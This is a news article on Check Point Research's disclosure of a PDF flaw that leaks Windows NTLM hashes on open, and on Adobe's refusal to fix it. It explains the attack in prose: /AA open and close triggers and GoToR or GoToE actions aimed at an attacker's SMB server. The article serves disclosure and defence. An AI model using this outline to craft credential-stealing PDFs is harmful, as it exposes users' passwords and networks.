Building a slide deck, pitch, or presentation? Here are the big takeaways:
- Security firm Check Point Research has revealed its discovery of a fundamental flaw in the structure of PDFs that could allow an attacker to steal Windows NTLM hashes and expose passwords.
- Check Point said that Adobe declined to fix the issue, instead referring concerned users to a Microsoft Security Bulletin from 2017 for a workaround.
The exploit lies deep in the structure of PDF files and only requires affected files to be opened to copy NT LAN Manager (NTLM) hashes to a remote source.
NTLM hashes are hashed password values that are stored on domain controllers. They’re part of every SMB request and are encrypted, but there is no shortage of NTLM hash decryption tools available.
Check Point contacted Adobe to report the vulnerability, and the company said it has no plans to fix the issue, instead referring users to a Microsoft Security Advisory from 2017 containing instructions on how to disable NTLM single sign on (SSO). Check Point also reached out to Foxit, publishers of a popular Acrobat alternative, but received no response.
A fundamental flaw in PDFs
As explained by Check Point Research, PDFs contain eight object types. The one being exploited in this case is the dictionary object.
Dictionaries contain entries consisting of two objects: a key and a value. Keys are names, and values can be absolutely anything.
Inside of an entry called /AA are actions that specify particular things to be done when PDFs are opened (triggered by the /O entry) or closed (triggered by /C). Beneath the open/close entry is another set of actions: /S, /F, and /D—those are what are being used to trigger this particular NTLM hash theft exploit.
/S specifies the kind of action to be performed when a PDF is opened or closed. Two particular actions are used in this exploit to direct the PDF to pull up a remote source: go to remote (GoToR), which can directly pull up a remote source, and go to embedded (GoToE), which can direct a PDF to a bit of injected code specified by the /D action.
The /F action specifies a location to be opened by GoToR or GoToE. In this exploit it’s an attacker’s SMB server, which triggers transmission of the victim’s NTLM hash, challenge, user, host name, and domain details. Once that data is stolen, Check Point said, the attacker can use their SMB server to launch other SMB relay attacks as well.
The exploit Check Point details is a troubling one since it deals with the basic structure of PDFs themselves. Attacks could be embedded into legitimate PDFs by third parties and used to harvest a nearly limitless amount of data—anything that particular user’s Windows credentials would give them access to.
It’s understandable that Adobe may not want to take action to fix this flaw in PDF design: It runs deep. Network administrators who rely on NTLM SSO authentication should seriously consider implementing Microsoft’s proposed changes to prevent this kind of attack from happening to their network.
It’s unfortunate that potential victims are the ones being forced to take action in this case, especially given the fact that many major security incidents are due to unapplied patches to known issues. In those cases it’s more forgivable since patches are relatively automatic: This fix requires changing registry keys and editing Group Policy settings instead of simply applying an automated patch.
Let’s hope Adobe isn’t forced to admit its mistake when a major NTLM hash theft happens. It may require a lot of work to fix, but it would be much more comforting to PDF users than kicking the can down the road.